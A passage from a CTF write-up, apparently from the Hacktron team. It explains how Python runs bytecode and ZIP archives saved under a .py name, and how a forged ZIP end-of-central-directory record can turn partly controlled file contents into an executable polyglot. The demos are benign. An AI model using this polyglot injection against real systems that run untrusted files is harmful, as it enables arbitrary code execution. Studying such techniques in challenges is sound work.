<p>However, the challenge used a Python 3.11 release that was not vulnerable to this specific bug: the fix first landed in Python 3.12 and was later backported to 3.11. Since the challenge specifically mentioned Python 3.11, I thought there might be other parser bugs that remained in that version. I wanted to look into the main changes to the parser implementation between Python 3.11 and 3.12, but it was a <strong><em>lot</em></strong> of code to sift through.</p>
<h3>Hacktron to the Rescue</h3>
<p>So I wrote a quick agent based on our Hacktron framework to help me out. It looked something like this (redacted, but you get the idea):</p>
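<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#768390"># Imports assumed here (pydantic-style models); the redacted original omits them.</span></span>
<span data-line=""><span style="color:#F47067">from</span><span style="color:#ADBAC7"> typing </span><span style="color:#F47067">import</span><span style="color:#ADBAC7"> List</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">from</span><span style="color:#ADBAC7"> pydantic </span><span style="color:#F47067">import</span><span style="color:#ADBAC7"> BaseModel</span></span>
<span data-line=""> </span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">class</span><span style="color:#F69D50"> ObservedDiff</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">BaseModel</span><span style="color:#ADBAC7">):</span></span>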
<span data-line=""><span style="color:#ADBAC7">    old_file: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""><span style="color:#ADBAC7">    old_line: </span><span style="color:#6CB6FF">int</span></span>
<span data-line=""><span style="color:#ADBAC7">    new_file: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""><span style="color:#ADBAC7">    new_line: </span><span style="color:#6CB6FF">int</span></span>
<span data-line=""><span style="color:#ADBAC7">    summary: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""><span style="color:#ADBAC7">    description: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""><span style="color:#ADBAC7">    diff: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""> </span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">class</span><span style="color:#F69D50"> ObservedDiffs</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">BaseModel</span><span style="color:#ADBAC7">):</span></span>
<span data-line=""><span style="color:#ADBAC7">    observed_diffs: List[ObservedDiff]</span></span>
<span data-line=""><span style="color:#ADBAC7">    overview: </span><span style="color:#6CB6FF">str</span></span>
<span data-line=""> </span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">TASK</span><span style="color:#F47067"> =</span><span style="color:#96D0FF"> """The old/ folder contains the old version of the codebase.</span></span>
<span data-line=""><span style="color:#96D0FF">The new/ folder contains the new version of the codebase.</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#96D0FF">Find the differences between the two versions of the codebase, focusing on the following ONLY:</span></span>
<span data-line=""><span style="color:#96D0FF">- files in the Parser/ folder</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#96D0FF">For each difference, provide an overview of the difference in the description and summary fields.</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#96D0FF">Explain clearly what the logical difference is between the two versions of the codebase in the overview field.</span></span>
<span data-line=""><span style="color:#96D0FF">"""</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#6CB6FF">RULES</span><span style="color:#F47067"> =</span><span style="color:#96D0FF"> """</span></span>
<span data-line=""><span style="color:#96D0FF">&lt;REDACTED&gt;</span></span>
<span data-line=""><span style="color:#96D0FF">"""</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390"># ----- Heavily simplified pseudocode -----</span></span>
<span data-line=""><span style="color:#ADBAC7">tools </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> [</span></span>
<span data-line=""><span style="color:#6CB6FF">    ...</span></span>
<span data-line=""><span style="color:#ADBAC7">    MyDiffTool(),</span></span>
<span data-line=""><span style="color:#6CB6FF">    ...</span></span>
<span data-line=""><span style="color:#ADBAC7">]</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#ADBAC7">agent </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> MyAgent(</span></span>
<span data-line=""><span style="color:#F69D50">  tools</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">tools,</span></span>
<span data-line=""><span style="color:#F69D50">  structured_output</span><span style="color:#F47067">=</span><span style="color:#ADBAC7">ObservedDiffs,</span></span>
<span data-line=""><span style="color:#F69D50">  task</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">TASK</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#F69D50">  rules</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">RULES</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#ADBAC7">)</span></span>
<span data-line=""><span style="color:#ADBAC7">agent.run()</span></span></code></pre></figure>
<p>The overview output was something like this:</p>
<blockquote>
<ol>
<li>
<p><strong>Introduction of New Language Features (Type Parameters and Type Aliases)</strong>:</p>
</li>
</ol>
<ul>
<li>
<p>The most prominent change is the full integration of <strong>type parameters</strong> (e.g., <code>def func[T]():</code>, <code>class MyClass[T]:</code>) and the new type statement for <strong>type aliases</strong> (<code>type MyType = int</code>) into the AST and parsing logic.</p>
</li>
<li>
<p><code>Python.asdl</code> was updated to define the AST nodes for <code>TypeAlias</code> and <code>type_param</code> (including <code>TypeVar</code>, <code>ParamSpec</code>, <code>TypeVarTuple</code>).</p>
</li>
<li>
<p><code>parser.c</code> gained new PEG grammar rules to parse these new syntax elements.</p>
</li>
<li>
<p><code>action_helpers.c</code> was updated to handle the construction of AST nodes with the new <code>type_params</code> fields.</p>
</li>
<li>
<p>This indicates a forward-looking enhancement to support more advanced static typing features in Python.</p>
</li>
</ul>
<ol start="2">
<li>
<p><strong>Refactoring and Modernization of the Parser Core</strong>:</p>
</li>
</ol>
<ul>
<li>There's a consistent effort to modernize and improve the C-API usage and internal mechanisms of the PEG parser.</li>
<li><strong>Reference Counting</strong>: Widespread adoption of <code>Py_NewRef</code> and <code>PyUnicode_InternImmortal</code> over <code>Py_INCREF</code> and <code>PyUnicode_InternInPlace</code> across <code>asdl_c.py</code> and <code>pegen.c</code>, reflecting best practices for C-API usage and better support for multi-interpreter environments.</li>
<li><strong>Tokenization and Error Handling</strong>: The Token struct in <code>pegen.h</code> now supports metadata, and the tokenization process in <code>pegen.c</code> and <code>pegen_errors.c</code> is more robust, using a structured struct token and improved lifecycle management. Error reporting has become more precise with <code>use_mark</code> and better f-string error propagation.</li>
<li><strong>F-string Parsing Overhaul</strong>: The dedicated FstringParser mechanism in <code>string_parser.c</code> and <code>string_parser.h</code> has been completely removed and replaced with a more integrated approach. This suggests that f-string parsing is now handled more directly by the core PEG parser, likely simplifying the codebase and improving performance.</li>
<li><strong>Thread and Subinterpreter Safety</strong>: Changes in <code>myreadline.c</code> explicitly address thread safety and subinterpreter isolation for global callbacks, ensuring the parser behaves correctly in complex runtime environments.</li>
<li><strong>Performance and Debugging</strong>: Refactoring of byte-to-character offset calculations in <code>pegen.c</code> for better UTF-8 handling, and the addition of a debug field to the Parser struct, point towards ongoing performance optimizations and improved debugging capabilities.</li>
</ul>
</blockquote>
<p>Most of these were not relevant at all; the only interesting lead was the f-string parsing overhaul, which appeared in the structured output like this:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="json" data-theme="github-dark-dimmed"><code data-language="json" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">{</span></span>
<span data-line=""><span style="color:#8DDB8C">      "old_file"</span><span style="color:#ADBAC7">: </span><span style="color:#96D0FF">"./old/Parser/string_parser.c"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#8DDB8C">      "new_file"</span><span style="color:#ADBAC7">: </span><span style="color:#96D0FF">"./new/Parser/string_parser.c"</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#8DDB8C">      "summary"</span><span style="color:#ADBAC7">: </span><span style="color:#96D0FF">"Complete redesign of string and f-string parsing, replacing the old FstringParser mechanism with a more integrated and generalized approach."</span><span style="color:#ADBAC7">,</span></span>
<span data-line=""><span style="color:#FF938A;font-style:italic">      ...</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>The description was something like this:</p>
<blockquote>
<p>The <code>string_parser.c</code> file has undergone a complete overhaul in its approach to parsing f-strings and possibly other string literals. The old <code>FstringParser</code> struct and its associated helper functions (e.g., <code>_PyPegen_FstringParser_Init</code>, <code>_PyPegen_FstringParser_ConcatFstring</code>, <code>_PyPegen_FstringParser_Finish</code>) have been entirely removed. They are replaced by new, more generalized functions like <code>_PyPegen_parse_string</code> and <code>_PyPegen_decode_string</code>. This indicates that the complex, stateful f-string parsing mechanism has been replaced with a simpler, more integrated approach, likely leveraging the enhanced token and parser infrastructure (as seen in <code>pegen.c</code> and <code>pegen.h</code>).</p>
</blockquote>
<p>This was a bit of a long shot, given that our injection point wasn't even in an f-string. But I decided to look into it anyway, and got side-tracked for an hour or so understanding how it worked. I now know way too much about Python's parser internals, but for the purposes of this writeup, I will skip the details. All you need to know is that this was a dead end...</p>
<h2>Idea 2: Polyglot Files</h2>
<p>When solving CTF challenges, a strategy I've taught myself is to timebox each lead to a few hours; if I haven't made any progress by then, I step back and look at the big picture again. At this point I had spent almost half a day looking for parser bugs and was getting nowhere.</p>
<p>I looked at the challenge again. We're running a file from the command line: <code>python3 &lt;temp_filename&gt;</code>. We don't control the filename, which always ends in <code>.py</code>, but we do control the contents of the file to a limited extent.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="python" data-theme="github-dark-dimmed"><code data-language="python" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">result </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> subprocess.run(</span></span>
<span data-line=""><span style="color:#ADBAC7">    [</span><span style="color:#96D0FF">"python3"</span><span style="color:#ADBAC7">, temp_filename], </span><span style="color:#F69D50">capture_output</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">True</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">text</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">True</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">timeout</span><span style="color:#F47067">=</span><span style="color:#6CB6FF">5</span></span>
<span data-line=""><span style="color:#ADBAC7">)</span></span></code></pre></figure>
<p>I vaguely remembered that <code>.pyc</code> files (compiled Python bytecode) can be run from the command line just like a regular <code>.py</code> file can, and would run even if renamed to have a <code>.py</code> extension.</p>
<figure class="mx-auto"><img alt="Discord Chat" loading="lazy" width="526" height="120" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat2.a19bb4d9.png&amp;w=640&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat2.a19bb4d9.png&amp;w=1080&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fchat2.a19bb4d9.png&amp;w=1080&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>This was yet another <strong><em>long</em></strong> shot, because <code>.pyc</code> files have magic headers, defined by <a href="https://github.com/python/cpython/blob/11503211c6e8985a305f8e2a8530e2258f982180/Include/internal/pycore_magic_number.h#L297-L301"><code>PYC_MAGIC_NUMBER_TOKEN</code> in <code>pycore_magic_number.h</code></a>, that appear at the start of the file, and we don't control the start of the file. More details about the <code>.pyc</code> format <a href="https://nedbatchelder.com/blog/200804/the_structure_of_pyc_files.html">here</a>.</p>
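<p>Both observations can be checked locally. This is a rough sketch, assuming a CPython interpreter is available as <code>sys.executable</code>; <code>run_pyc_as_py</code> is a hypothetical helper that compiles a snippet to bytecode, saves it under a <code>.py</code> name, and returns the first four bytes of the file along with the output of running it.</p>

```python
import importlib.util
import pathlib
import py_compile
import subprocess
import sys
import tempfile


def run_pyc_as_py(source):
    """Compile `source` to bytecode, store it under a .py name, and run it."""
    with tempfile.TemporaryDirectory() as tmp:
        src = pathlib.Path(tmp) / "src.py"
        disguised = pathlib.Path(tmp) / "disguised.py"
        src.write_text(source)
        # cfile only chooses the output path; the content is still bytecode.
        py_compile.compile(str(src), cfile=str(disguised), doraise=True)
        header = disguised.read_bytes()[:4]
        proc = subprocess.run(
            [sys.executable, str(disguised)],
            capture_output=True,
            text=True,
            timeout=10,
        )
        return header, proc.stdout


if __name__ == "__main__":
    header, out = run_pyc_as_py('print("ran from bytecode")')
    print(header == importlib.util.MAGIC_NUMBER, out.strip())
```

<p>If the interpreter behaves as described above, the header matches <code>importlib.util.MAGIC_NUMBER</code> and the bytecode still runs despite the <code>.py</code> suffix. The catch remains that the magic bytes sit at offset 0, which we don't control.</p>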
<p>But this got me thinking about how Python decides what kind of file it is dealing with, since it clearly doesn't infer that from the file extension.</p>
<h2>Understanding Python's File Type Detection</h2>
<h3>Hacktron to the Rescue</h3>
<p>Around this time, we had been testing a new internal debug UI for experimenting with our agents. Here's me giving it a spin with a task to find out how Python handles file types:</p>
<figure class="mx-auto"><img alt="Debug UI" loading="lazy" width="1772" height="1104" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_1.4c4b4552.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_1.4c4b4552.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_1.4c4b4552.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>Looking at the resulting trace, I found an interesting snippet:</p>
<blockquote>
<p>The central dispatch logic resides in an if/else if/else block starting at <a href="https://github.com/python/cpython/blob/3.11/Modules/main.c#L595-L609"><code>Modules/main.c:603</code></a>:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="c" data-theme="github-dark-dimmed"><code data-language="c" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">   if</span><span style="color:#ADBAC7"> (config</span><span style="color:#F47067">-&gt;</span><span style="color:#ADBAC7">run_command) {</span></span>
<span data-line=""><span style="color:#F47067">       *</span><span style="color:#ADBAC7">exitcode </span><span style="color:#F47067">=</span><span style="color:#DCBDFB"> pymain_run_command</span><span style="color:#ADBAC7">(config</span><span style="color:#F47067">-&gt;</span><span style="color:#ADBAC7">run_command);</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span>
<span data-line=""><span style="color:#F47067">   else</span><span style="color:#F47067"> if</span><span style="color:#ADBAC7"> (config</span><span style="color:#F47067">-&gt;</span><span style="color:#ADBAC7">run_module) {</span></span>
<span data-line=""><span style="color:#F47067">       *</span><span style="color:#ADBAC7">exitcode </span><span style="color:#F47067">=</span><span style="color:#DCBDFB"> pymain_run_module</span><span style="color:#ADBAC7">(config</span><span style="color:#F47067">-&gt;</span><span style="color:#ADBAC7">run_module, </span><span style="color:#6CB6FF">1</span><span style="color:#ADBAC7">);</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span>
<span data-line=""><span style="color:#F47067">   else</span><span style="color:#F47067"> if</span><span style="color:#ADBAC7"> (main_importer_path </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> NULL</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#F47067">       *</span><span style="color:#ADBAC7">exitcode </span><span style="color:#F47067">=</span><span style="color:#DCBDFB"> pymain_run_module</span><span style="color:#ADBAC7">(L</span><span style="color:#96D0FF">"__main__"</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">0</span><span style="color:#ADBAC7">);</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span>
<span data-line=""><span style="color:#F47067">   else</span><span style="color:#F47067"> if</span><span style="color:#ADBAC7"> (config</span><span style="color:#F47067">-&gt;</span><span style="color:#ADBAC7">run_filename </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> NULL</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#F47067">       *</span><span style="color:#ADBAC7">exitcode </span><span style="color:#F47067">=</span><span style="color:#DCBDFB"> pymain_run_file</span><span style="color:#ADBAC7">(config);</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span>
<span data-line=""><span style="color:#F47067">   else</span><span style="color:#ADBAC7"> {</span></span>
<span data-line=""><span style="color:#F47067">       *</span><span style="color:#ADBAC7">exitcode </span><span style="color:#F47067">=</span><span style="color:#DCBDFB"> pymain_run_stdin</span><span style="color:#ADBAC7">(config);</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span></code></pre></figure>
<ul>
<li><strong>Command Execution (<code>run_command</code>)</strong>: If the <code>run_command</code> field of the <code>PyConfig</code> struct is set (typically via the <code>-c</code> command-line flag), the interpreter executes the provided string as a Python command by calling <code>pymain_run_command</code>.</li>
<li><strong>Module Execution (<code>run_module</code>)</strong>: If <code>run_command</code> is not set but <code>run_module</code> is (typically via the <code>-m</code> flag), the interpreter runs the specified module by calling <code>pymain_run_module</code>.</li>
<li><strong>Package Execution</strong>: An interesting case arises if <code>main_importer_path</code> is not <code>NULL</code>. This variable is set earlier in the function (at <a href="https://github.com/python/cpython/tree/d542a9be51776e8d589363ee15164dec8dbd3a76/Modules/main.c#L557-L567">Modules/main.c:562</a>) if the <code>run_filename</code> points to a directory or a ZIP archive containing a <code>__main__.py</code> file. In this scenario, the interpreter executes the package as a module by calling <code>pymain_run_module(L"__main__", 0)</code>.</li>
<li><strong>File Execution (<code>run_filename</code>)</strong>: If none of the above conditions are met and <code>run_filename</code> is set, the interpreter proceeds to execute a script from a file. This is the most common execution path when a script is passed as a command-line argument.</li>
<li><strong>Interactive Mode / Stdin</strong>: If no command, module, or filename is provided, the interpreter falls back to <code>pymain_run_stdin</code>. This function is responsible for either reading and executing code from standard input or, if the input is a TTY, starting the interactive Read-Eval-Print Loop (REPL).</li>
</ul>
</blockquote>
<p>The package execution case was particularly interesting! If the <code>main_importer_path</code> is set, then the logic is different from running a Python script directly, and this is the case when the filename "<strong>points to a directory or a ZIP archive containing a <code>__main__.py</code> file</strong>".</p>
<p>Apparently, Python has allowed the interpreter to execute ZIP files <a href="https://bugs.python.org/issue1739468">since version 2.6</a>. This was intended as a way to distribute Python packages as ZIP archives, but it also meant that if we could somehow get Python to treat our file as a ZIP archive, we could potentially execute arbitrary code.</p>
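<p>This is easy to confirm with a throwaway archive. The sketch below assumes nothing beyond the standard library; <code>run_zip_named_py</code> is a hypothetical helper that stores a script as <code>__main__.py</code> inside a ZIP saved with a <code>.py</code> suffix and runs it with the current interpreter.</p>

```python
import pathlib
import subprocess
import sys
import tempfile
import zipfile


def run_zip_named_py(main_source):
    """Pack `main_source` as __main__.py in a ZIP named *.py, then run it."""
    with tempfile.TemporaryDirectory() as tmp:
        archive = pathlib.Path(tmp) / "archive.py"
        with zipfile.ZipFile(archive, "w") as zf:
            zf.writestr("__main__.py", main_source)
        proc = subprocess.run(
            [sys.executable, str(archive)],
            capture_output=True,
            text=True,
            timeout=10,
        )
        return proc.stdout


if __name__ == "__main__":
    print(run_zip_named_py('print("ran from inside a ZIP")'), end="")
```

<p>The suffix plays no part here: the interpreter runs the archive's <code>__main__.py</code> even though the file on disk is called <code>archive.py</code>.</p>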
<p>As suggested by the trace, the relevant code that determines the <code>main_importer_path</code> is as follows:</p>
<p><a href="https://github.com/python/cpython/blob/d542a9be51776e8d589363ee15164dec8dbd3a76/Modules/main.c#L557-L567"><code>Modules/main.c:557</code></a></p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="c" data-theme="github-dark-dimmed"><code data-language="c" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">if</span><span style="color:#ADBAC7"> (config</span><span style="color:#F47067">-&gt;</span><span style="color:#ADBAC7">run_filename </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> NULL</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#768390">    /* If filename is a package (ex: directory or ZIP file) which contains</span></span>
<span data-line=""><span style="color:#768390">        __main__.py, main_importer_path is set to filename and will be</span></span>
<span data-line=""><span style="color:#768390">        prepended to sys.path.</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390">        Otherwise, main_importer_path is left unchanged. */</span></span>
<span data-line=""><span style="color:#F47067">    if</span><span style="color:#ADBAC7"> (</span><span style="color:#DCBDFB">pymain_get_importer</span><span style="color:#ADBAC7">(config-&gt;run_filename, </span><span style="color:#F47067">&amp;</span><span style="color:#ADBAC7">main_importer_path,</span></span>
<span data-line=""><span style="color:#ADBAC7">                            exitcode)) {</span></span>
<span data-line=""><span style="color:#F47067">        return</span><span style="color:#ADBAC7">;</span></span>
<span data-line=""><span style="color:#ADBAC7">    }</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>I put Hacktron to work again to figure out how <code>pymain_get_importer</code> determines whether the file is a ZIP archive, and how the archive is parsed. I gave it the following task:</p>
<blockquote>
<p>In <code>Modules/main.c</code>, the following code determines whether a ZIP file is run.</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="c" data-theme="github-dark-dimmed"><code data-language="c" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">if</span><span style="color:#ADBAC7"> (config</span><span style="color:#F47067">-&gt;</span><span style="color:#ADBAC7">run_filename </span><span style="color:#F47067">!=</span><span style="color:#6CB6FF"> NULL</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#768390">    /* If filename is a package (ex: directory or ZIP file) which contains</span></span>
<span data-line=""><span style="color:#768390">        __main__.py, main_importer_path is set to filename and will be</span></span>
<span data-line=""><span style="color:#768390">        prepended to sys.path.</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#768390">      Otherwise, main_importer_path is left unchanged. */</span></span>
<span data-line=""><span style="color:#F47067">   if</span><span style="color:#ADBAC7"> (</span><span style="color:#DCBDFB">pymain_get_importer</span><span style="color:#ADBAC7">(config-&gt;run_filename, </span><span style="color:#F47067">&amp;</span><span style="color:#ADBAC7">main_importer_path,</span></span>
<span data-line=""><span style="color:#ADBAC7">                           exitcode)) {</span></span>
<span data-line=""><span style="color:#F47067">       return</span><span style="color:#ADBAC7">;</span></span>
<span data-line=""><span style="color:#ADBAC7">   }</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>Trace the relevant code paths to explain in detail how a ZIP file is detected, and how it is parsed. Follow all associated paths fully, and provide a clear chronological explanation from file type detection to execution.</p>
</blockquote>
<p>and got it to produce some customised structured output.</p>
<figure class="mx-auto"><img alt="Debug UI" loading="lazy" width="1771" height="1188" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_2.994aca66.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_2.994aca66.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdebug_ui_2.994aca66.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<p>First, we learn that the <code>zipimporter</code> class is one of the importer hooks that <code>PyImport_GetImporter</code> attempts to use (it is also the first one).</p>
<blockquote>
<p>The process begins in <code>Modules/main.c</code> with <code>pymain_get_importer</code> being called if <code>config-&gt;run_filename</code> is set. This function acts as a bridge to the Python import system, calling <code>PyImport_GetImporter</code>. <code>PyImport_GetImporter</code> retrieves <code>sys.path_hooks</code>, a list of callable importer hooks.</p>
<p>Crucially, during Python's initialization, the <code>zipimporter</code> class from the <code>zipimport</code> module is imported and inserted at the beginning of <code>sys.path_hooks</code>. This ensures <code>zipimporter</code> is the first to attempt to handle the <code>run_filename</code>.</p>
<p>The actual ZIP file detection occurs within the <code>zipimporter</code>'s <code>__init__</code> method. It verifies the path exists and is a regular file, then calls <code>_read_directory</code>. <code>_read_directory</code> parses the ZIP file structure by seeking the 'End of Central Directory Record' (identified by magic bytes <code>b'PK\x05\x06'</code>) and building an internal dictionary of file metadata. If the file does not conform to the ZIP format, a <code>ZipImportError</code> is raised.</p>
</blockquote>
<p>Crucially, it appears that <code>_read_directory</code> will start parsing the ZIP file structure as long as it finds an <em>End of Central Directory Record</em> (EOCD), which (as the name suggests) appears towards the <strong><em>end</em></strong> of the file. This solves our problem of only being able to control the middle of the file, since we can simply add a valid EOCD towards the end of our input, and make the trailing junk part of the EOCD record. A quick look at the <a href="https://en.wikipedia.org/wiki/ZIP_(file_format)#End_of_central_directory_record_(EOCD)">Wikipedia page</a> tells us that the EOCD record can end with a comment. More on this later!</p>
<figure class="mx-auto"><img alt="EOCD Wiki" loading="lazy" width="1352" height="678" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Feocd_wiki.6451ace7.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Feocd_wiki.6451ace7.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Feocd_wiki.6451ace7.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
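<p>To make the comment trick concrete, here is a minimal sketch of an EOCD record whose comment field swallows the trailing junk. The field layout follows the Wikipedia table above. The <code>build_eocd</code> helper and the placeholder size and offset values are my own illustration, not something taken from CPython or from the final exploit.</p>

```python
import struct

EOCD_SIG = b"PK\x05\x06"
TRAILING_JUNK = b'\r\nprint("Thanks for playing!")'

def build_eocd(cd_size: int, cd_offset: int, comment: bytes) -> bytes:
    """Pack a single-disk, single-entry EOCD record followed by its comment."""
    fixed = struct.pack(
        "<4sHHHHIIH",
        EOCD_SIG,
        0,             # number of this disk
        0,             # disk where the central directory starts
        1,             # central directory entries on this disk
        1,             # total central directory entries
        cd_size,       # size of the central directory in bytes
        cd_offset,     # offset of the central directory
        len(comment),  # comment length
    )
    return fixed + comment

# Placeholder size/offset values, only here to fill the fields.
record = build_eocd(cd_size=57, cd_offset=0x100, comment=TRAILING_JUNK)

# The signature is not in the last 22 bytes, but a backwards search finds it.
assert record[-22:-18] != EOCD_SIG
pos = record.rfind(EOCD_SIG)
(comment_len,) = struct.unpack_from("<H", record, pos + 20)
print(pos, comment_len, record[pos + 22 : pos + 22 + comment_len])
```

<p>The fixed part of the record is always 22 bytes, so everything after it up to the end of the file can be declared as comment.</p>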
<p>Next, we learn the expected format of the ZIP file. We just need a ZIP file that contains either a <code>__main__.py</code> or <code>__main__.pyc</code> file, which is what the interpreter will look for when it tries to run the ZIP file.</p>
<blockquote>
<p>Once <code>run_filename</code> is identified as a valid ZIP file, the <code>zipimporter</code> instance is returned. The interpreter then interacts with this instance to locate <code>__main__.py</code>.</p>
<p>It calls <code>find_spec('__main__')</code> on the <code>zipimporter</code>, which in turn calls <code>_get_module_info</code>. <code>_get_module_info</code> constructs potential paths for the module (e.g., <code>__main__.py</code>, <code>__main__.pyc</code>) and checks if these exist within the <code>self._files</code> dictionary (populated during the detection phase).</p>
<p>If <code>__main__.py</code> (or <code>__main__.pyc</code>) is found, <code>find_spec</code> returns a <code>ModuleSpec</code> object. This <code>ModuleSpec</code> indicates that the <code>zipimporter</code> is capable of loading the <code>__main__</code> module.</p>
</blockquote>
<h2>Constructing a Valid ZIP File</h2>
<h3>How <code>zipimporter</code> Parses ZIP Files</h3>
<p>Okay, but how does one construct a valid ZIP file that the Python interpreter will execute (if that is even possible)?</p>
<p>To answer this, we first need to understand how <code>zipimporter</code> parses ZIP files. To do this, I modified yet another Hacktron agent to teach me.</p>
<blockquote>
<p>The provided code is the source code for the Python 3.11 CPython implementation.</p>
<p>Your task is to find out how the <code>zipimporter</code> parses ZIP files. You need to explain clearly how a valid ZIP file is parsed, and whether an injection into a regular Python file can be used to trick the parser into running a ZIP file.</p>
<p>Explain this process in distinct sections, making reference to source code.</p>
</blockquote>
<p>This gave a pretty good overview, so I won't add my own commentary here:</p>
<blockquote>
<p>When a <code>zipimporter</code> instance is created with a path (e.g., <code>zipimporter('archive.zip')</code>), its <code>__init__</code> method (<code>Lib/zipimport.py:53</code>) calls <code>_read_directory</code>(path) (<code>Lib/zipimport.py:73</code>). This function is responsible for parsing the ZIP file’s central directory and caching its contents.</p>
<p><strong>Identifying a Zip File (Magic Bytes):</strong></p>
<p><code>_read_directory</code> first opens the potential ZIP archive using <code>_io.open_code(archive)</code> (<code>Lib/zipimport.py:339</code>).</p>
<p>It then seeks to the end of the file to locate the End of Central Directory Record (EOCD). It checks for the magic number <code>b'PK\x05\x06'</code> (<code>STRING_END_ARCHIVE</code>) at the expected position (22 bytes from the end) or by searching backwards for it if a comment is present (<code>Lib/zipimport.py:353</code>, <code>Lib/zipimport.py:429</code>). This is the primary indicator that the file is a ZIP archive.</p>
<p><strong>Parsing the Central Directory End (CDE) Record:</strong></p>
<p>Once the EOCD is found, <code>_read_directory</code> unpacks crucial information from it, including the <code>header_size</code> (size of the central directory) and <code>header_offset</code> (offset of the central directory from the start of the archive) using <code>_unpack_uint32</code> (<code>Lib/zipimport.py:378-Lib/zipimport.py:379</code>).</p>
<p><strong>Iterating Through Zip Entries (Central Directory):</strong></p>
<p>The function then seeks to the calculated <code>header_position</code> (start of the Central Directory) (<code>Lib/zipimport.py:390</code>).</p>
